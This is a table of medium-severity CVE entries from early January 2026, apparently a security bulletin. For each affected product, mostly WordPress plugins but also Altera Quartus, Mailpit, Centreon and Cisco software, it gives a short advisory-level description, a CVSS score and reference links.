| Altera--Quartus Prime Standard | Insecure Temporary File vulnerability in Altera Quartus Prime Standard Installer (SFX) on Windows, Altera Quartus Prime Lite Installer (SFX) on Windows allows Explore for Predictable Temporary File Names.This issue affects Quartus Prime Standard: from 23.1 through 24.1; Quartus Prime Lite: from 23.1 through 24.1. | 2026-01-06 | 6.7 | CVE-2025-14614 | https://www.altera.com/security/security-advisory/asa-0005 |
| Altera--Quartus Prime Standard | Uncontrolled Search Path Element vulnerability in Altera Quartus Prime Standard on Windows (Nios II Command Shell modules), Altera Quartus Prime Lite on Windows (Nios II Command Shell modules) allows Search Order Hijacking.This issue affects Quartus Prime Standard: from 19.1 through 24.1; Quartus Prime Lite: from 19.1 through 24.1. | 2026-01-06 | 6.7 | CVE-2025-14625 | https://www.altera.com/security/security-advisory/asa-0005 |
| ameliabooking--Booking for Appointments and Events Calendar Amelia | The Booking for Appointments and Events Calendar - Amelia plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on multiple AJAX actions in all versions up to, and including, 1.2.38. This makes it possible for unauthenticated attackers to mark payments as refunded, trigger sending of queued notifications (emails/SMS/WhatsApp), and access debug information among other things. | 2026-01-09 | 5.3 | CVE-2025-14720 | https://www.wordfence.com/threat-intel/vulnerabilities/id/771ed385-587c-400f-89c6-1a827c3e2c79?source=cve https://plugins.trac.wordpress.org/changeset/3429650/ameliabooking/trunk/src/Application/Commands/Square/SquareRefundWebhookCommandHandler.php |
| amirshk--Autogen Headers Menu | The Autogen Headers Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'head_class' parameter of the 'autogen_menu' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-13704 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a63bf106-78cf-441b-a1b3-77ec1cf6c22b?source=cve https://plugins.trac.wordpress.org/browser/autogen-headers-menu/trunk/index.php#L115 https://plugins.trac.wordpress.org/browser/autogen-headers-menu/tags/1.0.1/index.php#L115 https://plugins.trac.wordpress.org/browser/autogen-headers-menu/trunk/index.php#L53 https://plugins.trac.wordpress.org/browser/autogen-headers-menu/tags/1.0.1/index.php#L53 |
| amu02aftab--Client Testimonial Slider | The Client Testimonial Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'aft_testimonial_meta_name' custom field in the Client Information metabox in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the injected administrative page. | 2026-01-09 | 6.4 | CVE-2025-13897 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5bf12608-4e02-4b3a-9363-991dca5ee11b?source=cve https://plugins.trac.wordpress.org/browser/wp-client-testimonial/trunk/wp-client-testimonial.php#L117 https://plugins.trac.wordpress.org/browser/wp-client-testimonial/tags/2.0/wp-client-testimonial.php#L117 |
| anand_kumar--Header and Footer Scripts | The Header and Footer Scripts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the _inpost_head_script parameter in all versions up to, and including, 2.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-11453 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d658e087-8cc7-4653-af3c-407b6f73fb7b?source=cve https://plugins.trac.wordpress.org/browser/header-and-footer-scripts/tags/2.2.2/shfs.php#L119 |
| anilankola--Newsletter Email Subscribe | The Newsletter Email Subscribe plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.4. This is due to incorrect nonce validation on the nels_settings_page function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-07 | 4.3 | CVE-2025-14904 | https://www.wordfence.com/threat-intel/vulnerabilities/id/00dd9a3c-a9f9-4fd2-9c93-0def42cec496?source=cve https://plugins.trac.wordpress.org/browser/newsletter-email-subscribe/tags/2.4/newsletter-email-subscribe.php#L109 |
| anjan011--Simple User Meta Editor | The Simple User Meta Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user meta value field in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-07 | 4.4 | CVE-2025-14888 | https://www.wordfence.com/threat-intel/vulnerabilities/id/37342a62-97cd-43ef-af27-33092e840e67?source=cve https://plugins.trac.wordpress.org/browser/simple-user-meta-editor/tags/1.0.0/includes/templates/editor/index.php#L57 |
| anwerashif--xShare | The xShare plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.1. This is due to missing nonce validation on the 'xshare_plugin_reset()' function. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-07 | 4.3 | CVE-2025-13527 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d6006ffe-e2db-477f-8a9f-c0cf0434086b?source=cve https://plugins.trac.wordpress.org/browser/xshare/trunk/index.php#L50 https://plugins.trac.wordpress.org/browser/xshare/tags/1.0.1/index.php#L50 |
| anybodesign--AD Sliding FAQ | The AD Sliding FAQ plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'sliding_faq' shortcode in all versions up to, and including, 2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14122 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d6c277f4-28e0-4159-a524-6576d72d2059?source=cve https://plugins.trac.wordpress.org/browser/ad-sliding-faq/trunk/any-sliding-faq.php#L205 https://plugins.trac.wordpress.org/browser/ad-sliding-faq/tags/2.4/any-sliding-faq.php#L205 |
| Arista Networks--EOS | On affected platforms running Arista EOS with MACsec configuration, a specially crafted packet can cause the MACsec process to terminate unexpectedly. Continuous receipt of these packets with certain MACsec configurations can cause longer term disruption of dataplane traffic. | 2026-01-06 | 4.3 | CVE-2025-7048 | https://www.arista.com/en/support/advisories-notices/security-advisory/23120-security-advisory-0132 |
| arraytics--Appointment Booking Calendar WP Timetics Booking Plugin | The Appointment Booking and Scheduling Calendar Plugin - WP Timetics plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the update and register_routes functions in all versions up to, and including, 1.0.36. This makes it possible for unauthenticated attackers to view and modify booking details. | 2026-01-06 | 6.5 | CVE-2025-5919 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d8d50b65-7479-4140-9231-c06c18d8be8f?source=cve https://plugins.trac.wordpress.org/browser/timetics/tags/1.0.36/core/bookings/api-booking.php#L56 https://plugins.trac.wordpress.org/browser/timetics/tags/1.0.36/core/bookings/booking.php#L592 |
| ashishajani--Contact Form vCard Generator | The Contact Form vCard Generator plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'wp_gvccf_check_download_request' function in all versions up to, and including, 2.4. This makes it possible for unauthenticated attackers to export sensitive Contact Form 7 submission data via the 'wp-gvc-cf-download-id' parameter, including names, phone numbers, email addresses, and messages. | 2026-01-09 | 5.3 | CVE-2025-13717 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bdde4399-af90-4528-92a4-5176dfa5e453?source=cve https://plugins.trac.wordpress.org/browser/contact-form-vcard-generator/trunk/includes/wp-gvc-cf-settings.php#L13 https://plugins.trac.wordpress.org/browser/contact-form-vcard-generator/tags/2.4/includes/wp-gvc-cf-settings.php#L13 https://plugins.trac.wordpress.org/browser/contact-form-vcard-generator/trunk/includes/wp-gvc-cf-settings.php#L105 https://plugins.trac.wordpress.org/browser/contact-form-vcard-generator/tags/2.4/includes/wp-gvc-cf-settings.php#L105 |
| audrasjb--Key Figures | The Key Figures plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the kf_field_figure_default_color_render function in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-07 | 4.4 | CVE-2025-14792 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f4943899-a25a-4e50-b33e-139ed5e8f748?source=cve http://plugins.trac.wordpress.org/browser/key-figures/tags/1.1/admin/kf-admin.php#L201 |
| authlib--authlib | Authlib is a Python library which builds OAuth and OpenID Connect servers. In version 1.6.5 and prior, cache-backed state/request-token storage is not tied to the initiating user session, so CSRF is possible for any attacker that has a valid state (easily obtainable via an attacker-initiated authentication flow). When a cache is supplied to the OAuth client registry, FrameworkIntegration.set_state_data writes the entire state blob under _state_{app}_{state}, and get_state_data ignores the caller's session altogether. This issue has been patched in version 1.6.6. | 2026-01-08 | 5.7 | CVE-2025-68158 | https://github.com/authlib/authlib/security/advisories/GHSA-fg6f-75jq-6523 https://github.com/authlib/authlib/commit/2808378611dd6fb2532b189a9087877d8f0c0489 https://github.com/authlib/authlib/commit/7974f45e4d7492ab5f527577677f2770ce423228 |
| Automattic--WP Job Manager | Cross-Site Request Forgery (CSRF) vulnerability in Automattic WP Job Manager allows Cross Site Request Forgery.This issue affects WP Job Manager: from n/a through 2.0.0. | 2026-01-05 | 5.4 | CVE-2023-52212 | https://vdp.patchstack.com/database/wordpress/plugin/wp-job-manager/vulnerability/wordpress-wp-job-manager-plugin-2-0-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| averta--Depicter Popup & Slider Builder | The Popup and Slider Builder by Depicter - Add Email collecting Popup, Popup Modal, Coupon Popup, Image Slider, Carousel Slider, Post Slider Carousel plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'store' function of the RulesAjaxController class in all versions up to, and including, 4.0.7. This makes it possible for unauthenticated attackers to update pop-up display settings. | 2026-01-06 | 5.3 | CVE-2025-11370 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d35faf39-4882-4393-9b77-57dc45ac9d04?source=cve https://github.com/nguy3nB4oo11/depicter-vuln-repro/blob/main/RulesAjaxController.php https://github.com/nguy3nB4oo11/depicter-vuln-repro/blob/main/ajax.php https://plugins.trac.wordpress.org/changeset/3428118/depicter/trunk/app/routes/ajax.php |
| averta--Phlox | The Phlox theme for WordPress is vulnerable to Stored Cross-Site Scripting via the `data-caption` HTML attribute in all versions up to, and including, 2.17.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-06 | 6.4 | CVE-2025-4776 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a49f8150-a27d-4801-8923-31af335c3cbd?source=cve https://themes.trac.wordpress.org/changeset/300858/ |
| averta--Shortcodes and extra features for Phlox theme | The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a combination of the 'tag' and 'title_tag' parameters in all versions up to, and including, 2.17.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-10 | 6.4 | CVE-2025-12379 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1144e0d9-692e-45a5-ac63-bcdd64a8bd8a?source=cve https://plugins.trac.wordpress.org/browser/auxin-elements/tags/2.17.12/includes/elementor/widgets/heading-modern.php#L1194 https://plugins.trac.wordpress.org/changeset/3429103/auxin-elements/trunk/includes/elementor/widgets/heading-modern.php |
| averta--Shortcodes and extra features for Phlox theme | The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.17.13 via the auxels_ajax_search due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract titles of draft posts that they should not have access to. | 2026-01-06 | 5.3 | CVE-2025-13215 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7f47ab91-7d91-4231-91ef-66c556ad8496?source=cve https://plugins.trac.wordpress.org/browser/auxin-elements/tags/2.17.12/public/includes/frontend-ajax.php#L348 |
| Awethemes--AweBooking | Insertion of Sensitive Information Into Sent Data vulnerability in Awethemes AweBooking allows Retrieve Embedded Sensitive Data.This issue affects AweBooking: from n/a through 3.2.26. | 2026-01-05 | 6.5 | CVE-2025-68014 | https://vdp.patchstack.com/database/wordpress/plugin/awebooking/vulnerability/wordpress-awebooking-plugin-3-2-26-sensitive-data-exposure-vulnerability?_s_id=cve |
| axllent--mailpit | Mailpit is an email testing tool and API for developers. Prior to version 1.28.2, the Mailpit WebSocket server is configured to accept connections from any origin. This lack of Origin header validation introduces a Cross-Site WebSocket Hijacking (CSWSH) vulnerability. An attacker can host a malicious website that, when visited by a developer running Mailpit locally, establishes a WebSocket connection to the victim's Mailpit instance (default ws://localhost:8025). This allows the attacker to intercept sensitive data such as email contents, headers, and server statistics in real-time. This issue has been patched in version 1.28.2. | 2026-01-10 | 6.5 | CVE-2026-22689 | https://github.com/axllent/mailpit/security/advisories/GHSA-524m-q5m7-79mm https://github.com/axllent/mailpit/commit/6f1f4f34c98989fd873261018fb73830b30aec3f |
| axllent--mailpit | Mailpit is an email testing tool and API for developers. Versions 1.28.0 and below have a Server-Side Request Forgery (SSRF) vulnerability in the /proxy endpoint, allowing attackers to make requests to internal network resources. The /proxy endpoint validates http:// and https:// schemes, but it does not block internal IP addresses, enabling attackers to access internal services and APIs. This vulnerability is limited to HTTP GET requests with minimal headers. The issue is fixed in version 1.28.1. | 2026-01-07 | 5.8 | CVE-2026-21859 | https://github.com/axllent/mailpit/security/advisories/GHSA-8v65-47jx-7mfr https://github.com/axllent/mailpit/commit/3b9b470c093b3d20b7d751722c1c24f3eed2e19d |
| baqend--Speed Kit | Missing Authorization vulnerability in baqend Speed Kit allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Speed Kit: from n/a through 2.0.2. | 2026-01-08 | 4.3 | CVE-2026-22487 | https://patchstack.com/database/wordpress/plugin/baqend/vulnerability/wordpress-speed-kit-plugin-2-0-2-broken-access-control-vulnerability?_s_id=cve |
| beshkin--Shabat Keeper | The Shabat Keeper plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the $_SERVER['PHP_SELF'] parameter in all versions up to, and including, 0.4.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-09 | 6.1 | CVE-2025-13701 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3aa73be6-0836-4540-8a80-e1da34c0ee0d?source=cve https://plugins.trac.wordpress.org/browser/shabat-keeper/trunk/shabat-keeper.php#L148 https://plugins.trac.wordpress.org/browser/shabat-keeper/tags/0.4.4/shabat-keeper.php#L148 |
| bg5sbk--MiniCMS | A flaw has been found in bg5sbk MiniCMS up to 1.8. Impacted is the function delete_page of the file /minicms/mc-admin/page.php of the component File Recovery Request Handler. This manipulation causes improper authentication. The attack is possible to be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 6.5 | CVE-2025-15455 | VDB-339488 | bg5sbk MiniCMS File Recovery Request page.php delete_page improper authentication VDB-339488 | CTI Indicators (IOB, IOC, IOA) Submit #725137 | MiniCMS https://github.com/bg5sbk/MiniCMS V1.8 Unauthorized page deletion https://github.com/ueh1013/VULN/issues/14 |
| BiggiDroid--Simple PHP CMS | A vulnerability was found in BiggiDroid Simple PHP CMS 1.0. This impacts an unknown function of the file /admin/editsite.php. The manipulation of the argument image results in unrestricted upload. The attack can be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-09 | 4.7 | CVE-2025-15495 | VDB-340273 | BiggiDroid Simple PHP CMS editsite.php unrestricted upload VDB-340273 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #725890 | BiggiDroid Simple PHP CMS 1.0 Unrestricted Upload Submit #726040 | BiggiDroid Simple PHP CMS 1.0 Unrestricted Upload (Duplicate) https://gitee.com/hdert/ck/issues/IDGO28 https://github.com/Asim-QAZi/RCE-Simplephpblog-biggiedroid |
| bitpressadmin--Bit Form Custom Contact Form, Multi Step, Conversational Form & Payment Form builder | The Bit Form - Contact Form Plugin plugin for WordPress is vulnerable to unauthorized workflow execution due to missing authorization in the triggerWorkFlow function in all versions up to, and including, 2.21.6. This is due to a logic flaw in the nonce verification where the security check only blocks requests when both the nonce verification fails and the user is logged in. This makes it possible for unauthenticated attackers to replay form workflow executions and trigger all configured integrations including webhooks, email notifications, CRM integrations, and automation platforms via the bitforms_trigger_workflow AJAX action granted they can obtain the entry ID and log IDs from a legitimate form submission response. | 2026-01-07 | 6.5 | CVE-2025-14901 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0402e4a6-73ba-49e6-bf80-997ac83b4cfe?source=cve https://plugins.trac.wordpress.org/browser/bit-form/tags/2.21.6/includes/Frontend/Ajax/FrontendAjax.php#L146 https://plugins.trac.wordpress.org/browser/bit-form/tags/2.21.6/includes/Frontend/Ajax/FrontendAjax.php#L30 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3429172%40bit-form%2Ftrunk&old=3420966%40bit-form%2Ftrunk&sfp_email=&sfph_mail=#file827 |
| bluelabsio--records-mover | A weakness has been identified in bluelabsio records-mover up to 1.5.4. The affected element is an unknown function of the component Table Object Handler. This manipulation causes sql injection. The attack needs to be launched locally. Upgrading to version 1.6.0 is sufficient to fix this issue. Patch name: 3f8383aa89f45d861ca081e3e9fd2cc9d0b5dfaa. You should upgrade the affected component. | 2026-01-07 | 5.3 | CVE-2023-7333 | VDB-339566 | bluelabsio records-mover Table Object sql injection VDB-339566 | CTI Indicators (IOB, IOC, TTP) https://github.com/bluelabsio/records-mover/pull/254 https://github.com/bluelabsio/records-mover/commit/3f8383aa89f45d861ca081e3e9fd2cc9d0b5dfaa https://github.com/bluelabsio/records-mover/releases/tag/v1.6.0 |
| bruterdregz--Contact Us Simple Form | The Contact Us Simple Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 4.4 | CVE-2025-14028 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2c78ab13-22ed-4f00-b132-c9ff99c51273?source=cve https://plugins.trac.wordpress.org/browser/contact-us-simple-form/trunk/contact-us-simple-form.php#L223 https://plugins.trac.wordpress.org/browser/contact-us-simple-form/tags/1.0/contact-us-simple-form.php#L223 https://plugins.trac.wordpress.org/browser/contact-us-simple-form/trunk/contact-us-simple-form.php#L239 https://plugins.trac.wordpress.org/browser/contact-us-simple-form/tags/1.0/contact-us-simple-form.php#L239 |
| BuddyDev--MediaPress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BuddyDev MediaPress allows Stored XSS.This issue affects MediaPress: from n/a through 1.6.2. | 2026-01-08 | 6.5 | CVE-2026-22519 | https://patchstack.com/database/wordpress/plugin/mediapress/vulnerability/wordpress-mediapress-plugin-1-6-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| buddydev--MediaPress | The MediaPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mpp-uploader shortcode in all versions up to, and including, 1.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-06 | 6.4 | CVE-2025-14552 | https://www.wordfence.com/threat-intel/vulnerabilities/id/82b5ade8-582e-4440-b043-d30e757c9467?source=cve https://plugins.trac.wordpress.org/browser/mediapress/tags/1.6.1/core/gallery/mpp-gallery-template-tags.php#L665 |
| burtrw--Lesson Plan Book | The Lesson Plan Book plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-09 | 6.1 | CVE-2025-13893 | https://www.wordfence.com/threat-intel/vulnerabilities/id/18696937-5cc5-4e14-940d-fc25468377a3?source=cve https://plugins.trac.wordpress.org/browser/lesson-plan-book/trunk/lesson.php#L719 https://plugins.trac.wordpress.org/browser/lesson-plan-book/trunk/lesson.php#L1776 https://plugins.trac.wordpress.org/browser/lesson-plan-book/trunk/lesson.php#L1910 |
| bww--URL Image Importer | The URL Image Importer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.7 due to insufficient sanitization of SVG files. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. | 2026-01-06 | 6.4 | CVE-2025-14120 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8704320e-9624-4924-92e8-adb61356aecb?source=cve https://plugins.trac.wordpress.org/browser/url-image-importer/trunk/url-image-importer.php#L176 https://plugins.trac.wordpress.org/browser/url-image-importer/tags/1.0.7/url-image-importer.php#L176 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3429292%40url-image-importer&new=3429292%40url-image-importer&sfp_email=&sfph_mail= |
| callumalden--Starred Review | The Starred Review plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the PHP_SELF variable in all versions up to, and including, 1.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-07 | 6.1 | CVE-2025-14118 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2eb65c25-9400-4c5a-a4b2-b72628725500?source=cve https://plugins.trac.wordpress.org/browser/starred-review/trunk/starred-review.php#L29 https://plugins.trac.wordpress.org/browser/starred-review/tags/1.4.2/starred-review.php#L29 |
| Campcodes--Supplier Management System | A flaw has been found in Campcodes Supplier Management System 1.0. Affected by this issue is some unknown functionality of the file /retailer/edit_profile.php. This manipulation of the argument txtRetailerAddress causes sql injection. Remote exploitation of the attack is possible. The exploit has been published and may be used. | 2026-01-05 | 6.3 | CVE-2026-0597 | VDB-339506 | Campcodes Supplier Management System edit_profile.php sql injection VDB-339506 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731433 | campcodes Supplier Management System 1.0 SQL Injection https://github.com/dhy-spec/cve/issues/1 https://www.campcodes.com/ |
| carboneio--carbone | A weakness has been identified in carboneio carbone up to fbcd349077ad0e8748be73eab2a82ea92b6f8a7e. This impacts an unknown function of the file lib/input.js of the component Formatter Handler. Executing a manipulation can lead to improperly controlled modification of object prototype attributes. The attack can be launched remotely. This attack is characterized by high complexity. The exploitability is said to be difficult. Upgrading to version 3.5.6 will fix this issue. This patch is called 04f9feb24bfca23567706392f9ad2c53bbe4134e. You should upgrade the affected component. A successful exploitation can "only occur if the parent NodeJS application has the same security issue". | 2026-01-07 | 5 | CVE-2024-14020 | VDB-339503 | carboneio carbone Formatter input.js prototype pollution VDB-339503 | CTI Indicators (IOB, IOC, TTP, IOA) https://github.com/carboneio/carbone/commit/04f9feb24bfca23567706392f9ad2c53bbe4134e https://github.com/carboneio/carbone/releases/tag/3.5.6 |
| cbutlerjr--WP-Members Membership Plugin | The WP-Members Membership Plugin for WordPress is vulnerable to unauthorized file access in versions up to, and including, 3.5.4.4. This is due to storing user-uploaded files in predictable directories (wp-content/uploads/wpmembers/user_files/<user_id>/) without implementing proper access controls beyond basic directory listing protection (.htaccess with Options -Indexes). This makes it possible for unauthenticated attackers to directly access and download sensitive documents uploaded by site users via direct URL access, granted they can guess or enumerate user IDs and filenames. | 2026-01-07 | 5.3 | CVE-2025-12648 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9d0154fd-0cab-4445-a92e-c44ae9931479?source=cve https://plugins.trac.wordpress.org/browser/wp-members/trunk/includes/class-wp-members-forms.php#L604 https://plugins.trac.wordpress.org/browser/wp-members/trunk/includes/admin/class-wp-members-admin-api.php#L707 https://plugins.trac.wordpress.org/changeset/3427043/wp-members/trunk/includes/class-wp-members-forms.php |
| Centreon--Infra Monitoring | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (DSM extenstio configuration modules) allows Stored XSS to user with elevated privileges. This issue affects Infra Monitoring: from 25.10.0 before 25.10.1, from 24.10.0 before 24.10.4, from 24.04.0 before 24.04.8. | 2026-01-05 | 6.8 | CVE-2025-12511 | https://github.com/centreon/centreon/releases https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12511-centreon-dsm-medium-severity-5361 |
| Centreon--Infra Monitoring | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (Hosts configuration form modules) allows Stored XSS to users with high privileges. This issue affects Infra Monitoring: from 25.10.0 before 25.10.2, from 24.10.0 before 24.10.15, from 24.04.0 before 24.04.19. | 2026-01-05 | 6.8 | CVE-2025-12513 | https://github.com/centreon/centreon/releases https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12513-centreon-web-medium-severity-5360 |
| Centreon--Infra Monitoring | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (Administration ACL menu configuration modules) allows Stored XSS to users with high privileges. This issue affects Infra Monitoring: from 25.10.0 before 25.10.2, from 24.10.0 before 24.10.15, from 24.04.0 before 24.04.19. | 2026-01-05 | 6.8 | CVE-2025-13056 | https://github.com/centreon/centreon/releases https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-13056-centreon-web-medium-severity-5358 |
| Centreon--Infra Monitoring | Missing Authorization vulnerability in Centreon Infra Monitoring (Administration parameters API endpoint modules) allows Accessing Functionality Not Properly Constrained by ACLs, resulting in Information Disclosure like downtime or acknowledgement configurations. This issue affects Infra Monitoring: from 25.10.0 before 25.10.2, from 24.10.0 before 24.10.15, from 24.04.0 before 24.04.19. | 2026-01-05 | 5.3 | CVE-2025-12519 | https://github.com/centreon/centreon/releases https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12519-centreon-web-medium-severity-5359 |
| charmbracelet--soft-serve | Soft Serve is a self-hostable Git server for the command line. Prior to version 0.11.2, an authorization bypass in the LFS lock deletion endpoint allows any authenticated user with repository write access to delete locks owned by other users by setting the force flag. The vulnerable code path processes force deletions before retrieving user context, bypassing ownership validation entirely. This issue has been patched in version 0.11.2. | 2026-01-08 | 5.4 | CVE-2026-22253 | https://github.com/charmbracelet/soft-serve/security/advisories/GHSA-6jm8-x3g6-r33j https://github.com/charmbracelet/soft-serve/commit/000ab5164f0be68cf1ea6b6e7227f11c0e388a42 |
| chrisblackwell--1180px Shortcodes | The 1180px Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class' shortcode attribute in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14114 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ddf2ca43-a1d5-4809-b8ad-916b23f71a7d?source=cve https://plugins.trac.wordpress.org/browser/1180px-shortcodes/trunk/1180px.php#L115 https://plugins.trac.wordpress.org/browser/1180px-shortcodes/tags/1.1.1/1180px.php#L115 |
| Cisco--Cisco Identity Services Engine Software | A vulnerability in the licensing features of Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, remote attacker with administrative privileges to gain access to sensitive information. This vulnerability is due to improper parsing of XML that is processed by the web-based management interface of Cisco ISE and Cisco ISE-PIC. An attacker could exploit this vulnerability by uploading a malicious file to the application. A successful exploit could allow the attacker to read arbitrary files from the underlying operating system that could include sensitive data that should otherwise be inaccessible even to administrators. To exploit this vulnerability, the attacker must have valid administrative credentials. | 2026-01-07 | 4.9 | CVE-2026-20029 | cisco-sa-ise-xxe-jWSbSDKt |
| Cisco--Cisco Secure Firewall Threat Defense (FTD) Software | Multiple Cisco products are affected by a vulnerability in the processing of DCE/RPC requests that could allow an unauthenticated, remote attacker to cause the Snort 3 Detection Engine to leak sensitive information or to restart, resulting in an interruption of packet inspection. This vulnerability is due to an error in buffer handling logic when processing DCE/RPC requests, which can result in a buffer use-after-free read. An attacker could exploit this vulnerability by sending a large number of DCE/RPC requests through an established connection that is inspected by Snort 3. A successful exploit could allow the attacker to unexpectedly restart the Snort 3 Detection Engine, which could cause a denial of service (DoS). | 2026-01-07 | 5.8 | CVE-2026-20026 | cisco-sa-snort3-dcerpc-vulns-J9HNF4tH |
| Cisco--Cisco Secure Firewall Threat Defense (FTD) Software | Multiple Cisco products are affected by a vulnerability in the processing of DCE/RPC requests that could allow an unauthenticated, remote attacker to cause the Snort 3 Detection Engine to leak sensitive information or to restart, resulting in an interruption of packet inspection. This vulnerability is due to an error in buffer handling logic when processing DCE/RPC requests, which can result in a buffer out-of-bounds read. An attacker could exploit this vulnerability by sending a large number of DCE/RPC requests through an established connection that is inspected by Snort 3. A successful exploit could allow the attacker to obtain sensitive information in the Snort 3 data stream. | 2026-01-07 | 5.3 | CVE-2026-20027 | cisco-sa-snort3-dcerpc-vulns-J9HNF4tH |
